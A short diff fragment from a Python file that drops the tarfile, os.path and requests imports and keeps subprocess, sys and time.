@@ -1,6 +1,3 @@
-import tarfile
-import os.path
-import requests
 import subprocess
 import sys
 import time
